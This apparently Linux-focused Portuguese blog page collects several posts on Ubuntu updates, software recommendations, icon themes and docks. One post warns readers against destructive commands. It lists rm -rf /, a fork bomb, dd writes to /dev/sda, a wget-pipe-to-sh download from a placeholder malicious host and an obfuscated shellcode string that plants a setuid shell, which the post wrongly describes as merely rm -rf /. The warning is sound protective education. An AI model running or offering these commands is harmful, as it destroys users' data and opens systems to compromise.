Home » Linux

Como reparar o seu sistema sem ser V1D4L0K4!

No artigo de hoje vamos falar sobre algumas práticas que eu considero extremamente válidas para qualquer pessoa que se julga um usuário de computador médio ou avançado, se você for leigo, este é o trabalho do técnico e não seu, e francamente, não há nada de errado com isso.

Formata, formata, formata!



Há alguns anos atrás eu iniciava a minha carreira no ramo da tecnologia, como a maior parte das pessoas, eu iniciei minhas experiências com o computador pessoal com o Windows, especificamente com o XP, para ser mais exato. Podemos dizer que comparado a algumas pessoas que eu conheço, eu comecei até tarde.

Naquela época eu era o tipo mais básico de usuário de computador. Usava o Notebook para jogar GTA San Andreas, FIFA e Need For Speed: Carbon e não ia muito além disso, via algum filme, ouvia mp3 e fazia trabalhos para escola no Word.

Desde aquela época, customizar e configurar o computador era algo que me atraia. Eu não sabia formatar, não fazia ideia de como isso funcionava, então costumava ser receoso sobre o que exatamente mudar, pois, por conta de onde eu morava, se precisasse levar o computador para a assistência, além de caro, era um pouco distante, apenas na cidade vizinha tinha algum serviço do tipo disponível.

Essa pequena história reflete o início da minha vida com a informática e com a tecnologia de forma geral, tirando os consoles que eu tive contato mais cedo.

Quando você se torna o mestre das computarias


Tem uma fase da vida de toda pessoa que gosta de tecnologia em que ela começa a ler, estudar, ver vídeos, em suma, consumir conteúdo relacionado ao tema. Quando isso acontece, é mais do que natural que a confiança aumente para começar a fazer testes mais avançados no computador, testar programas e sistemas operacionais diferentes.

Houveram duas épocas em que cheguei a formatar o computador mais de um dúzia de vezes por dia.

Por vezes não era necessário, outras, eram puro treinamento. Esses momentos foram quando a Microsoft lançou o Windows 7, e eu passei do XP para ele e quando eu comecei a testar Linux com o Debian e com o Sabayon.

É exatamente sobre essa fase que eu quero conversar com você, dependendo da sua postura para resolver problemas, o seu aproveitamento pode ser muito melhor.

Formata que eu gosto!


Houve um momento em que eu estava aprendendo a formatar o computador, eu tinha um DVD de Windows e eu tinha um DVD do Sabayon Linux. Como eu não tinha acesso pleno à internet e francamente, mesmo que tivesse eu não sabia pesquisar, desconhecia até mesmo a existência da palavra "fórum", a maneira que eu encontrei de treinar formatação foi formatando o meu computador diariamente. Nessa época meu backup cabia em um pen drive, então, nunca foi problema.

Depois que formatar se tornou algo simples pra mim, eu deixei de formatar tantas vezes diariamente, porém, quando tinha um problema no computador eu não pensava duas vezes e formatava. Uma vez eu exclui as barras do KDE Plasma e como eu não sabia pôr elas de volta, eu formatei o computador para ter os recursos no sistema de novo.

Acho que você acabou de perceber o problema disso, não?

Independente do sistema operacional, formatar nem sempre é a solução. Pode resolver? Pode. Existem circunstâncias em que vai resolver? Sim, diversas. Mas se a sua intenção é aprofundar seus conhecimentos, formatar deve ser o seu último recurso, especialmente no Linux, onde praticamente tudo é "arrumável".



Seguidamente eu vejo pessoas com problemas que podem ser contornados de diversas formas e  outras pessoas sugerindo que mudar de sistema é a melhor solução. Isso é um equívoco tremendo!

As distribuições Linux em geral não tem tanta diferença assim entre elas e dependendo do problema, simplesmente trocar de sistema não servirá para nada e pior, eventualmente vai trazer mais dúvidas  e problemas para o usuário por se tratar de algo novo.

Dicas para resolver problemas e ainda tirar conhecimento das situações


Se a sua intenção é, além de ajudar a resolver o problema de alguém, trazer conhecimento para você e para a pessoa que você está tentando ajudar, considere identificar exatamente qual o causador do problema.

Sempre há um motivo específico!

- Ah! Meu Windows está dando tela azul!

- Ah! Meu Ubuntu está travando!

- Ah! Meu Fedora não instala um programa!

As respostas que eu costumo ver são mais ou menos assim:

- Esse (encaixe o sistema que preferir aqui) não funciona mesmo, é todo bugado. Melhor instalar o (encaixe o sistema que preferir aqui), eu uso há (encaixe o tempo que você usa o sistema) e nunca deu problema.

Eu já perdi as contas de contas vezes eu vi situações semelhantes a esta.

Identifique o problema, sempre há um agente causador.

Se você conseguir identificar o que causa o comportamento anômalo, além de acrescentar conhecimento para você ou para quem precisa de ajuda (ou ambos), você provavelmente conseguirá evitar que o problema ocorra novamente e dar uma solução eficaz e permanente.

Entenda que um mesmo sistema vai se comportar de forma diferente em computadores diferentes e quanto mais pessoas o utilizarem, mais sujeito a provações diferentes ele vai estar e problemas mais diversos tendem a aparecer. Qual sistema tem mais bugs? Um em que a cada 10 usuários, 3 tem problemas ou um que a cada 100 usuários, 20 tem problemas?

Não é porque você não teve problemas, que o mesmo vai se repetir com um terceiro, e não é porque você teve problemas, que os demais não vão ter. O nível de complexidade para estas coisas é muito alto para você achar que simplesmente trocar de sistema resolve qualquer parada.

Não seja radical, não formate por conta de qualquer problema (obviamente respeitando a urgência da ocasião), procure reparar o seu computador de uma forma mais específica, isso vai te tornar um usuário muito mais técnico. Se o problema é a interface, troque a interface, se o problema é o Kernel, troque o Kernel, se o problema é o Driver, troque o driver, se o problema for você... bom, estude um pouco mais, conhecimento nunca é demais, não é, não? 😀

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




segunda-feira, 20 de fevereiro de 2017

Ubuntu 16.04.2 LTS lançado, veja como instalar as melhorias

A Canonical liberou nesta semana a nova atualização para o Ubuntu 16.04 LTS, recebendo assim a numeração de 16.04.2. Existem algumas observações para serem feitas quanto a sua atualização, especialmente quando se refere ao Kernel, saiba mais:

16.04.2 LTS





Para quem não sabe muito bem como funciona, o Ubuntu tem lançamentos semestrais, ou seja, a cada seis meses sai uma nova versão, sendo que de dois em dois anos saem as versões LTS (Long Term Support). As versões LTS podem ser consideradas as versões estáveis do sistema, enquanto as versões intermediárias são lançamentos onde, normalmente, novas tecnologias são testadas. A versão 17.04, que sai no próximo mês de Abril, é um exemplo disso, nela serão testadas algumas atualizações para o Unity 8, a nova interface gráfica do Ubuntu.

Por conta destes fatores, normalmente as versões LTS são as escolhidas pelos usuários para missões críticas, trabalho, produtividade e relacionados. São elas também que normalmente são utilizadas em servidores, tanto por quem é cliente da Canonical, quanto por quem não é.

Versões LTS recebem atualizações constantes durante um prazo de 5 anos, enquanto as versões non-LTS recebem atualizações por cerca de 8 a 9 meses; mais um motivo para que os usuários que usam o Ubuntu para trabalhar escolham as versões com suporte extenso.

Mas o que significa este suporte (LTS)?


O suporte LTS significa que os usuários receberão atualizações de segurança e de software por um período de 5 anos, entretanto, isso não significa, em termos de software, que as atualizações serão sempre para a última versão disponível e sim para uma próxima versão considerada estável. Até mesmo o Kernel normalmente vai respeitar a versão LTS, recebendo atualizações dentro de sua própria versão.

Você pode contornar isso utilizando repositórios PPA para uma determinada aplicação que você deseja que esteja em uma versão mais recente ou utilizando um pacote Snap para a mesma, existem várias formas de contornar a questão, entretanto, nem todas as aplicações ficarão defasadas com o tempo, por questão de segurança, navegador de internet e aplicações com acesso à rede normalmente estão em suas últiamas versões. Lembre-se a estabilidade vai contra a novidade, dificilmente um software mais recente vai ser tão estável quanto um mais antigo e que teve maior tempo para ser debugado, um ótimo exemplo disso é o Debian Stable.

O que há de novo na versão 16.04.2 LTS?


Conforme o tempo passa, muitas atualizações e correções são feitas. Para evitar que os usuários que baixarem o Ubuntu 16.04 LTS precisem baixar tantas atualizações, a Canonical vai lançando novas compilações da ISO com as atualizações e melhorias já incorporadas, assim nascem essas releases com um terceiro número, como 16.04.1, 16.04.2, etc. É como se fossem os Services Packs do Windows.

Essas atualizações normalmente trazem versões mais recentes de uma série de programas e eventualmente, novos recursos para o sistema em si, mas um grande diferencial é a atualização do Kernel Linux, dando assim mais suporte para novos hardwares e mais desempenho em algumas situações.

As principais novidades do Ubuntu 16.04.2 LTS são a adição do Kernel Linux 4.8.x, Mesa Driver 12, e melhorias intensas no suporte de hardware, além da possibilidade da utilização do Kernel Ubuntu HWE (Hardware Enablement) e de correções de bugs menores.

Como atualizar para o Ubuntu 16.04.2 LTS?


Se você está rodando outro sistema operacional ou outra versão do Ubuntu que não seja a LTS atual (16.04), minha recomendação é formatar e instalar ela do zero, porém, se você já é um usuário do Ubuntu 16.04 LTS, assim como eu, você só precisa atualizar o sistema normalmente e você estará nesta versão.


Use o aplicativo "Atualizador de programas" para atualizar o sistema.

Ou use o terminal:
sudo apt update && sudo apt dist-upgrade

Esse comando não vai mudar a versão do seu Kernel, o Ubuntu vai continuar utilizando o Kernel LTS, ou seja o 4.4.x, que vai receber atualizações de segurança até o fim dos 5 anos de suporte do Ubuntu.

Se você deseja utilizar um Kernel mais recente dentro da LTS, poderá utilizar o Kernel HWE, que acrescenta pacotes novos de drivers de vídeo e de suporte para novos componentes de hardware, é ideal para quem tem computadores muito novos ou equipamentos recém lançados.


Antes de atualizar o Kernel de uma versão para outra, eu recomendo remover os eventuais drivers proprietários que você tenha, especialmente os de vídeo e de wifi, assim você evita conflitos.

Para atualizar para o Ubuntu 16.04.2 LTS com o Kernel HWE você precisa rodar estes comandos:
sudo apt-get install --install-recommends xserver-xorg-hwe-16.04
sudo apt-get upgrade
O primeiro comando direcionada para uma nova versão do X que puxara por dependência o restante dos pacotes.

Este recurso não é experimental, ele vem sendo utilizando desde o Ubuntu 10.10 para trazer suporte extendido para os lançamentos do Ubuntu, fazendo com que mesmo LTS antigas, como o Ubuntu 12.04.5 LTS, que ainda está em atividade (no final dela, inclusive), possam rodar em computadores lançados "mês passado", contudo, uma mudança de Kernel é sempre algo muito sensível, então minha recomendação em linhas gerais é somente atualizar em caso de necessidade, falta de reconhecimento de hardware ou caso você seja entusiasta e principalmente, se você sabe o que está fazendo.

Kernel Update

A diferença dos pacotes de Kernel 


Como isto é algo que considero importante, acho que colocar mais algumas informações à respeito quem podem te ajudar a decidir qual caminho você quer seguir.

O Kernel padrão do Ubuntu chama-se General Availability ou simplesmente GA, os pacotes deste Kernel constumam se manter dentro dos lançamentos do LTS ao qual pertencem, no caso o 4.4, com variações seguindo o seguinte exemplo nomenclatura:
linux-image-4.4.0-21-generic (Kernel Padrão)
ou
linux-image-4.4.0-21-lowlatency (Kernel de baixa latência)
O Kernel HWE tem a seguinte nomenclatura:
linux-headers-generic-hwe-16.04 (Kernel padrão com Hardware Enablement)
ou
 linux-headers-lowlatency-hwe-16.04 (Kernel de baixa latência com Hardware Enablement)
Para mais informações sobre o HWE consulte a Wiki do Ubuntu. 


Alterantivamente, quem deseja manipular versões diferentes do Kernel Linux no Ubuntu de forma gráfica e fácil, pode usar o UKUU (Ubuntu Kernel Update Utility), assim você pode usar a versão do Kernel que bem entender.

Outras variações do Ubuntu também receberam a nova atualização, o procedimento para atualizar é o mesmo em todas e você também pode baixar as ISOs completas através dos links abaixo:

Kubuntu 16.04.2 LTS
Ubuntu GNOME 16.04.2 LTS
Ubuntu MATE 16.04.2 LTS
Xubuntu 16.04.2 LTS
Lubuntu 16.04.2 LTS


Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




sexta-feira, 17 de fevereiro de 2017

Encryptpad - Um editor de textos com criptografia para você escrever textos secretos

Conforme a preocupação com a segurança cresce entre as pessoas, programas que permitem a criptografia de seus dados acabam se tornando populares e interessantes. Hoje você vai conhecer um editor de textos que tem estas propriedades, o Encryptpad.

Encryptpad




Assim que você ver o Encryptpad pela primeira vez vai entender o quão simples é utilizá-lo. Acima de tudo ele também é um editor de textos, então ele possui ferramentas populares a qualquer editor de textos, mas o que realmente o diferencia é a possibilidade de criptografar o conteúdo do documento que você criar.

EncryptPad


Dentre os principais recursos da aplicação, podemos destacar:

-  Super para Windows, Linux e macOS;
- Suporte para Passphrase e para Key File ou a combinação dos dois;
- Gerador de senhas customizáveis;
- Suporte para encriptação binária;
- Salvar documentos no modo "Apenas leitura";
- Suporte há diversos algoritmos para criação de senhas e criptografia;
- Suporte para compressão em Zlib ou ZIP.

Como instalar o Encryptpad no seu computador?


Como comentado no início do artigo, o Encryptpad suporte os principais sistemas operacionais da atualidade, você encontra instruções para instalação diretamente em sua página no GitHub. Para usuários do Ubuntu e do Linux Mint, assim como seus derivados, basta adicionar este PPA. Apenas copie o comando abaixo e cole no terminal, pressione "enter", digite a sua senha, pressione "enter" novamente e aguarde a instalação:
sudo add-apt-repository ppa:nilarimogard/webupd8 -y && sudo apt update && sudo apt install encryptpad encryptcli -y
Para quem não gosta de usar o Terminal, basta adicionar o PPA: ppa:nilarimogard/webupd8


Os pacotes necessários para se instalar (você pode usar o Synaptic para isso) são os seguintes:

- encryptpad 
- encryptcli

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




domingo, 12 de fevereiro de 2017

7 programas para Linux que você não encontra no Windows

É comum vermos as pessoas falando que o Windows tem muitos programas que não existem em outras plataformas e isso não está incorreto de fato, mas existem também programas ótimos para Linux que não existem na plataforma da Microsoft. Encare este artigo como fator de curiosidade, a intenção não é dizer que um sistema é melhor que outro, porque isso é algo muito relativo a quem usa o computador, todos sabemos disso. Dito isso, vamos pra lista?

Apps exclusivos do Linux




Existem muitos aplicativos do mundo Linux que não possuem versões para outros sistemas operacionais, ele são muito bons e as pessoas por vezes acabam deixando de conhecê-los justamente pela sua exclusividade. Separei nesta lista 7 deles que eu considero excelentes, confira:

1 - Gnome Boxes

Gnome Boxes

O Gnome Boxes é um aplicativo para criação e gerenciamento de máquinas virtuais, especialmente fácil para usar virtualização via KVM. O que eu acho bacana nele, ainda que eu goste de usar também o VirtualBox e o VMWare, é a sua simplicidade.

Quem gosta de testar sistemas operacionais através de virtualização vai encontrar no Boxes a opção mais simples para fazer isso, poucos cliques, interface limpa e minimalista, não conhece uma outra aplicação com a mesma simplicidade no mundo Windows. Ele é grátis também, outro ponto positivo.

2 - Simple Screen Recorder


Simple Screen Recorder

Temos vários programas exclusivos para captura de tela, o Kazam por exemplo, é outra grande opção. 

Além dele, temos o OBS também, que não é exclusivo, mas está disponível para Linux da mesma forma. O SSR, ou Simple Screen Recorder, apesar do nome, é uma aplicação cheia de opções e incrivelmente útil para quem quer fazer captura de tela. Muito do canal Diolinux foi feito usando esta aplicação exclusiva para Linux, ele tem mais recursos e é muito mais leve do que o popular Fraps por exemplo, além de ser grátis.

3 - Rapid Photo Downloader



Essa é outra aplicação muito bacana, especialmente para quem trabalha com vídeos e fotos.  Assim como o nome sugere, o Rapid Photo Downloader, auxilia você a passar arquivos de um dispositivo para outro, como de um cartão de memória de câmera para um dispositivo de armazenamento. Uso  ele com frequência para passar os arquivos brutos do canal para o PC.

4 - Simple Scan (Digitalizador Simples)



Esta aplicação vem com praticamente todas as distribuições Linux e mais uma vez, seu nome não poderia ser mais descritivo. A maior parte das aplicações para trabalhar com Scanner tem um visual mais carregado e boa parte das pessoas, especialmente usuários comuns de computador, "apanham" para escanear uma simples página.

O Simple Scan tem exatamente essa função, ele basicamente tem o botão de Scan que faz o seu trabalho com primor e opções simples para cortar, ajustar e girar a imagem escaneada. Até tenho um um caso interessante para contar à respeito deste programa.

Há algum tempo atrás instalei o Ubuntu no computador de um ex-aluno meu, o Notebook que ele usava era compartilhado pela família e sua mãe, que trabalhava como caixa de um posto de combustível, usava a ferramenta de Scanner com muita frequência, fazia uso do Simple Scan para enviar copias das notas que ela gerava no dia a dia, ela mesma confirmou que achava muito mais fácil usar ele do que a alternativa que havia no próprio software da impressora para Windows.

5 - GParted


GParted

O GParted é um dos aplicativos mais poderosos quando se fala em gerenciamento de partições e discos, ele pode ser usado para tarefas banais, como formatar o seu pen drive, ou até mesmo para redimensionar, organizar e formatar discos rígidos inteiros. O GParted também possui uma versão em LiveCD, para que você possa usar no lugar de uma aplicação como o PartedMagic, mesmo que o seu computador não rode Linux, no entanto, a versão desktop somente está disponível para o "sistema do pinguim". Assim como as outras ferramentas apresentadas até agora, o GParted é completamente grátis.

6 - Shutter

Shutter

O Shutter é incomparável, é definitivamente a melhor aplicação para fazer capturas de tela que eu já conheci, ainda mais por conter um editor embutido. Lembro que em 2013 eu escrevi um artigo aqui no blog de um momento em que passei uma semana usando Windows e o Shutter foi uma das aplicações que eu mais senti falta. Todas as imagens usadas neste artigo e boa parte das imagens utilizadas nos outros artigos aqui do blog, especialmente os que envolvem tutoriais, foram feitas no Shutter.

Ele também é grátis e tem até sincronia com serviços de armazenamento de imagem em nuvem, é incrível e um dos meus programas favoritos.

7 - Geary Mail/Pantheon Mail


Geary Mail

Quem gosta de organizar seus e-mails com estilo e com um design sofisticado vai encontrar no Geary, ou em sua versão para o elementary OS, o Pantheon Mail, uma das melhores alternativas. Assim como as demais aplicações ele é de graça e muito simples de se utilizar com uma interface minimalista.

Concluindo


É engraçado pensar desta forma, mas o Linux também tem aplicações nativas que são muito boas e exclusivas, o mais engraçado é que ao contrário do que se poderia imaginar, a comunidade trabalha para desenvolver versões para os outros sistemas também, talvez se eu refazer essa lista daqui há alguns anos, ou meses, dependendo da aplicação, muitos destes já não serão mais exclusivos, essa é uma das coisas mais bacanas.

Uma amostra disso é esta outra lista com 10 programas ótimos que funcionam tanto no Linux, quanto no Windows. Dessa forma, você sempre terá grandes programas à sua disposição ,independente da plataforma que você use e normalmente sem precisar pagar por isso, vai dizer que não é bacana? 😄

Como a brincadeira aqui é listar programas exclusivos, se você conhecer mais algum bacana que não está na lista, comente logo abaixo para deixar o conteúdo mais completo.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




quinta-feira, 9 de fevereiro de 2017

TuxGuitar - Escreva partituras para guitarra compatíveis com o GuitarPRO no Linux

Quem é músico, ou aspirante a músico, pode encontrar no TuxGuitar uma excelente ferramenta para criar partituras das suas músicas favoritas e quem sabe, compor a próxima "Stairway to Heaven".

TuxGuitar




O TuxGuitar é uma alternativa livre e grátis para criar e editar partituras musicais, incluindo arquivos exportados do GuitarPRO, PowerTab e TablEdit, programas famosos deste segmento.
Leia também: Como instalar o MuseScore no Ubuntu
A interface do programa não deve ser problemática, até para inexperientes, todos os botões informam suas funções quando você repousa o mouse sobre eles,  simples e organizada, na tela inicial é exibida uma página com a visão da partitura e tablatura, onde ambas podem ser editadas.
Leia também: Efeitos de guitarra no Linux com o Guitarix
Algumas ferramentas estão na parte parte superior da tela e abaixo ficam as pistas e o braço da guitarra que exibe as casas e as cordas tocadas. Apesar de ter um foco maior em guitarras, você também pode usar o TuxGuitar para outras coisas. É possível criar partituras para outros instrumentos de cordas e até mesmo bateria. O TuxGuitar permite montar os arranjos de uma música completa com seus principais instrumentos: baixo, guitarra, bateria.
Leia também: Aplicativos para músicos pelo Wine no Linux
O programa é leve e não exige grandes recursos de hardware, como requisito, é preciso ter o Java instalado no computador.

Você pode fazer o download diretamente do site oficial do TuxGuitar ou diretamente do SourceForge.

Dica: Ao baixar e extrair o programa, você encontrará um arquivo SH dentro dele, ele só vai funcionar se você tiver informado ao seu gestor de arquivos para tratar ele como executável e perguntar para você se você quer rodar o programa. No caso do Ubuntu (Nautilus), vá até as configurações do gestor e na aba de comportamento, marque a opção para perguntar para executar arquivos de texto, assim quando você der dois cliques, basta clicar no executar.
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




segunda-feira, 30 de janeiro de 2017

Entrevistamos os desenvolvedores do Stoq, um programa de gestão comercial grátis disponível para Linux

Hoje você vai conhecer melhor o Stoq, um ERP grátis e de código aberto que você pode usar no Linux para gerenciar toda a sua empresa.

Programa para gestão comercial grátis - Stoq




O Stoq pode ser uma ótima solução para você que é micro, pequeno e até mesmo, médio, empresário. Você pode gerenciar toda da sua loja através dele, incluindo gerenciamento de estoque, vendas e até mesmo emissão de notas fiscais. O mais interessante disso tudo é que o Stoq é gratuito, ou seja, você não precisa gastar recursos da sua empresa para utilizá-lo e ainda pode rodá-lo em alguma distribuição Linux, para evitar ainda mais gastos, ficar dentro da legalidade e melhorar a segurança.



A entrevista foi feita com Cainã D'ajuda, membro da equipe do Stoq, você pode saber mais sobre o programa consultando os seguintes links:


Nos links acima você consegue fazer o download, tanto do programa, quanto do código fonte, além de ter acesso à versão com suporte pago do Stoq, caso você deseje.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




quinta-feira, 26 de janeiro de 2017

7 comandos perigosos do Linux que você NUNCA deve executar

Como o número de usuários leigos de Linux vem aumentando com o tempo, acho pertinente alertar as pessoas sobre alguns comandos que podem ser perigosos, tanto para o sistema, quanto para os dados contidos no computador.

7 Comandos perigosos do mundo Linux




O terminal é uma ferramenta muito poderosa, por conta disso é bom você dominá-lo, ou pelo menos entendê-lo, para evitar problemas no seu sistema baseado em Linux.
Veja também: O curso no Diolinux EAD para aprender a dominar o terminal
Os grandes problemas que você pode enfrentar usando o terminal de forma indiscriminada normalmente estão atrelados a comandos de sobrescrita de dados, então vamos mostrar alguns aqui que você deve prestar especial atenção quando vir alguém sugerindo que você faça no seu computador com Linux.

Atenção: Você NÃO deve executar nenhum destes comandos no seu computador, isso pode causar danos irreversíveis que nós não nos responsabilizamos, o artigo tem a intenção de ser instrutivo, justamente para evitar este tipo de situação.

1 - rm -rf


É um comando clássico do do Linux que teoricamente não faz nada de mais, ele serve apenas para apagar arquivos, e é aí que mora o perigo. Dependendo da forma que ele for aplicativo o resultado pode ser muito desagradável, por isso é importante você entender o que os comandos fazem, vamos explicar um pouco melhor neste exemplo:
- rm: comando usado no Linux para deletar arquivos.
- rm -r: o comando deleta pastas recursivamente, mesmo que a pastas esteja vazia.
- rm -f: cUsando este parâmetro, o propriedade de "apenas leitura" que um arquivo tenha é removida sem perguntar, permitindo que o arquivo seja apagado.
- rm -rf / : Usando a combinação dos dois parâmetros com a "/" você diz para o sistema apagar tudo que está no diretório raiz do sistema.
- rm -rf * : Força o apagamento de tudo que está no diretório atual ou no de trabalho, dependendo de onde você estiver.
- rm -rf . : Acrescentando um ponto, você pode apagar também as pastas ocultas, além das normais.

Tome muito cuidado ao executar um comando destes, especialmente se for feito como root ou usando o sudo.


Tão perigoso que pode ser este comando, que atualmente o Linux se protege contra ele, se você rodá-lo, mesmo com sudo ou como root, ele não vai funcionar, para isso é preciso usar os parâmetros descritos na imagem acima. Da mesma forma que o Linux protege você de destruir o sistema sem querer, ele também permite que você o destrua mediante a ter certeza de que é realmente isso que você quer, curioso, não é?

2 - :(){:|:&};:


Este comando funciona como uma "Fork Bomb", ele opera definindo uma função chamada ':', que se chama duas vezes, uma vez em primeiro plano e outra em segundo plano, o processo se repete indefinidamente até que o sistema trave.

3 - qualquer comando para > /dev/sda


A forma com que o Linux lê as partições e discos é diferente do Windows, por conta disso, normalmente novatos não conseguem entender em primeira instância como eles são distribuídos. Normalmente a localização dos dispositivos de armazenamento do sistema ficam dentro de /dev, sendo que podem haver vários por ali e normalmente o sda está presente.

O problema do comando acima é que ele redireciona a saída de qualquer comando que seja colocado para o seu bloco de armazenamento, desta foma sobrescrevendo alguns dados e corrompendo outros.

4 - mv pasta/diretório /dev/null


Eu costumava brincar sobre o /dev/null me referindo a ele como o "buraco negro" do Linux. Tudo que é enviado para ele é perdido "para sempre". Então tome cuidado ao mover qualquer coisa para esta localização. O comando mv serve para mover arquivos ou diretórios para o destino indicado, se este destino for o /dev/null você estará mandando seus arquivos pra Nárnia.

5 - wget http://malicious_source -O- | sh


Este comando vai aparecer para você instalar alguns programas. O wget é o programa responsável por fazer o download da URL que vem logo após, ele é bem útil para baixar arquivos em geral, o problema está no arquivo que ele baixa e na sequência do comando  que o executa no caso dele ser um shell script. Só baixe arquivos desta forma de fontes que você considera confiáveis e se estiver na dúvida, baixe apenas o arquivo de shell, eliminando qualquer parâmetro que apareça após o link, assim você pode abrir ele em um editor de texto de sua preferência e verificar o que há dentro dele.

6 - dd if=/dev/random of=/dev/sda


Assim como o ítem 3 da nossa lista, o grande problema aqui é o destino ser o /dev/sda. Tome cuidado. O comando dd pode ser muito útil para copiar arquivos e até mesmo partições inteiras, como no exemplo 6, mas se a saída for um outro disco, tome cuidado, pois o resultado irá sobrepor os dados lá existentes.

7 - Comandos disfarçados


Como eu comentei à princípio, o terminal é uma ferramenta poderosa, se você não dominá-lo, é bom ter cuidado com que você for rodar nele, se o você não fala a língua do terminal, saiba que ele fala muitas outras. O comando abaixo nada mais é do que o comando indicado no primeiro item da nossa lista, só que em forma hexadecimal.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;

Ele tem o mesmo propósito do famigerado "rm -rf /", por isso, não rode coisas no terminal que você não sabe para quem servem, existem muito conteúdo grátis a internet para você estudar sobre e até mesmo alguns bons cursos pagos, como é o caso do "Dominando o Terminal" aqui do blog mesmo, mas em linhas gerais, se você evitar colocar comandos que você não sabe para que servem direito, os problemas já serão minimizados. 

Agora espalhe este conhecimento para ajudar mais pessoas a ficarem precavidas sobre estes pequenos percalços da vida computacional.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




quarta-feira, 25 de janeiro de 2017

Os 3 temas de ícones mais bonitos para Linux

Uma das coisas mais legais das distros Linux (pode incluir até o Android aqui) é que tudo é muito personalizável, e isso, obviamente, incluem os temas de ícones. Hoje eu vou mostrar para você os temas que eu considero serem os melhores.

Top 3 Icon Packs for Linux




Um bom tema de ícones pode dar uma vitalidade extra para o seu desktop e quando se trata do desenvolvimento de temas de ícones para Linux, existem 3 equipes que dão um verdadeiro show.

1 - Moka


Moka icons para Linux

Certamente um belo conjunto, com ícones arrendondados, lembrando muito os padrões mobiles, especialmente os usados no iPhone e nos celulares da Xiaomi.

Acesse o site para baixar o tema. Nós temos um tutorial de instalação para ele também, basta clicar aqui para ver.

2 - Numix


Ícones Numix

Os temas Numix tem muitas variações, uma das mais populares é a "Circle", mas existem outras opções que você encontra no site oficial.  Os ícones Numix Circle, como o nome sugere, usam formatos arrendondados para todas as artes, com um tema flat muito agradável.

Veja aqui o nosso tutorial para instalar o tema.

3 - Paper


Paper Icon Theme

Este é o tema que eu venho utilizando atualmente, na verdade, venho utilizado uma variação que eu mesmo fiz chamada Paper Orange Diolinux, o tema é inspirado no material design da Google e os ícones são muito bem desenhados. Você pode acessar o site oficial para saber as novidades sobre ele.

Confira aqui o nosso tutorial para instalação deste tema.


Claro que temas são puramente pessoais, então sinta-se à vontade para compartilhar nos comentários os temas que você mais gosta.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




sábado, 14 de janeiro de 2017

Os 3 melhores aplicativos de Dock para Linux

Você gostar de utilizar docks para organizar a sua área de trabalho e agilizar a sua produtividade? Então hoje você vai conhecer os que eu considero serem os 3 melhores aplicativos para essa finalidade. Confira:

Dock Apps para Linux




Existem vários aplicativos para essa finalidade, mas na minha opinião, 3 deles se destacam. Se você quiser utilizar algum deles, independente da interface que você use, certamente eles vão agilizar o seu trabalho.

1 - Cairo Dock

Cairo Dock

Eu usava muito o Cairo Dock antigamente, até por que, ele é muito mais do que um "simples dock", o Cairo Dock consegue prover uma interface gráfica praticamente completa, tanto que ao instalar ele você encontrará na sua tela de login uma sessão Cairo Dock. De longe, ele é o mais pesado dos 3 deste post, mas também é o que talvez tenha mais opções de configuração e plugins para aumentar as suas funções.

Você encontra ele no repositório de praticamente todas as distribuições Linux, basta consultar a central de aplicativos.

2 - Plank

Plank Dock Linux

Se o Cairo Dock é cheio de recursos e pode ser até complexo, dependendo do seu ponto de vista, o Plank Dock, com origem no projeto do elementary OS é o contrário. Ele é extremamente simples, porém, funcional. Nele você encontrará todos os aspectos básicos do funcionamento de um aplicativo de dock.

No Plank você encontra, assim como no Cairo Dock, funções de ocultamento e comportamento, suporte para temas e animações e posição na área de trabalho.

O Plank também está nos repositórios de praticamente todas as distros, basta procurar por ele na sua Central de aplicativos, ou instalar pelo terminal.

3 - Docky

Docky

O Docky é o meu terceiro colocado, ele é muito mais parecido com o Plank do que com o Cairo, mas tem algumas funções a mais se comparado com o Plank. Ele é tão leve quanto o Plank e pode ser uma boa alternativa também, ele tem muitos temas disponíveis que você encontra na internet.

Mais uma vez, você o encontra na Central de Aplicativos da sua distribuição, ou pode fazer a instalação via terminal.

E aí, tem mais algum que você goste e não está na lista? Adicione a sua sugestão nos comentários! :)

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




quinta-feira, 12 de janeiro de 2017

10 aplicativos open source que você pode utilizar no Windows e no Linux

Eu acho muito interessante o fato de que programas de código aberto que começaram apenas no mundo Linux ganharam versões para outras plataformas, como Windows e Mac, isso aproxima muito as coisas e faz com que as pessoas possam transitar livremente entre as plataforma, o que é algo muito positivo.

10 open source apps




Listei aqui 10 aplicativos de código aberto que eu utilizo praticamente todos os dias e que poderiam ser usados no Windows também. Acho importante ressaltar a importância disso, quando bons aplicativos existem em várias plataformas, alguém usa Windows pode passar a usar Linux sem sentir falta de muitos programas e o contrário também é verdadeiro.

Conheça agora a minha lista de 10 aplicativos de código aberto que podem ser usados em ambas as plataformas.

1 - Firefox

Firefox Linux e Windows

